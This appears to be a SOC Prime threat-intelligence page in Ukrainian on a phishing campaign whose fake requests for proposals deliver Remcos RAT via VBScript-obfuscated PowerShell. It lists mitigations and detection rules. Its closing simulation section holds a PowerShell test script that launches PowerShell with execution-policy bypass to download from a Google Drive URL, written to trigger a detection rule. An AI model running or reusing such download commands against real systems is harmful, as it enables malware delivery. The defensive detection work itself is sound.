SOC Prime Bias: High

05 Oct 2026 16:41 UTC

Фальшиві електронні листи із запитом на комерційну пропозицію використовуються у фішингових атаках із шкідливим ПЗ

Author Photo
SOC Prime Team linkedin icon Стежити
Фальшиві електронні листи із запитом на комерційну пропозицію використовуються у фішингових атаках із шкідливим ПЗ
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисники розповсюджують фішингові електронні листи, замасковані під запити на проєктні пропозиції, щоб доставити шкідливе навантаження. Кампанія використовує VBScript для приховування команд PowerShell, які в решті-решт отримують багатоступеневе навантаження і Remcos RAT. Останній шкідливий код підтримує виконання віддалених команд, клавіатурний запис і витік даних із скомпрометованих систем.

Розслідування

Центр безпеки AhnLab (ASEC) виявив фішингову кампанію, в якій стислі архіви містять приховані VBScripts. Дослідники розкрили метод обфускації, що зловживає notepad.exe для відновлення імені виконуваного файла ‘powershell’ та використовує заміну рядків на основі токенів для команд PowerShell. Багатоступеневе навантаження також використовує COM-об’єкти для обходу UAC.

Пом’якшення

Користувачі повинні перевіряти домен електронної пошти відправника й залишатися обережними при відкритті неочікуваних вкладень або гіперпосилань. Організації мають налаштувати фільтрацію електронної пошти для блокування підозрілих розширень файлів, таких як .vbs, .exe і .js. Користувачам також слід уникати введення чутливих облікових даних на неофіційних або підозрілих URL-адресах, отриманих через небажані електронні листи.

Відповідь

Коли виявлено шкідливу активність, перевірте законність оригінального електронного листа та дослідіть підозрілу активність файлів у %APPDATA%. Перевірте несанкціоноване виконання PowerShell та індикатори, пов’язані з Remcos RAT. Ізолюйте скомпрометовані системи від мережі, щоб запобігти додатковій C2-комунікації, латеральній активності та ймовірному витоку даних.

Хід атаки

Ми все ще оновлюємо цю частину.

Виявлення

LOLBAS WScript / CScript (через process_creation)

Команда SOC Prime
01 жовтня 2026

Можливе Інфільтрація/Екфільтрація Даних / C2 через Сторонні Сервіси / Інструменти (через dns_query)

Команда SOC Prime
01 жовтня 2026

Можливе Інфільтрація/Екфільтрація Даних / C2 через Сторонні Сервіси / Інструменти (через dns)

Команда SOC Prime
01 жовтня 2026

IOC (HashMd5) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції

Правила SOC Prime AI
01 жовтня 2026

IOC (SourceIP) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції

Правила SOC Prime AI
01 жовтня 2026

IOC (DestinationIP) для виявлення: Фішинг/Шахрайство: Остерігайтеся фішингових електронних листів, замаскованих під запити на пропозиції

Правила SOC Prime AI
01 жовтня 2026

Виявлення скрипту PowerShell, що підключається до сервера C2 [З’єднання Мережі Windows]

Правила SOC Prime AI
01 жовтня 2026

Шкідливе виконання PowerShell через обфускацію VBScript [PowerShell Windows]

Правила SOC Prime AI
01 жовтня 2026

Виконання симуляції

  • Описатака та команди: Атакуючий відправляє фішинговий лист з посиланням на документ. Коли користувач клацає посилання, воно виконує приховану команду PowerShell, призначену для завантаження шкідливого скрипту з репозиторію Google Drive. Атакуючий використовує export=download параметр, щоб забезпечити безпосереднє завантаження файла, а не його перегляд у браузері. Мета полягає в виконанні безфайлового навантаження в пам’яті, щоб уникнути антивірусу на основі диска. Команда створена для активації спеціального правила виявлення, націленого на цю модель завантаження.

  • Скрипт регресійного тесту:

    # Симуляція завантаження файлу PowerShell з Google Drive через певний URL-паттерн
    $targetUrl = "https://drive.google.com/uc?export=download&id=1A2B3C4D5E6F7G8H9I0J"
    Start-Process powershell.exe -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Write-Host 'Downloading payload...'; $data = Invoke-WebRequest -Uri '$targetUrl';`""
  • Команди очистки:

    # Жодних файлів не записується на диск у цій специфічній симуляції, 
    # але ми зупиняємо процес, якщо він все ще працює.
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue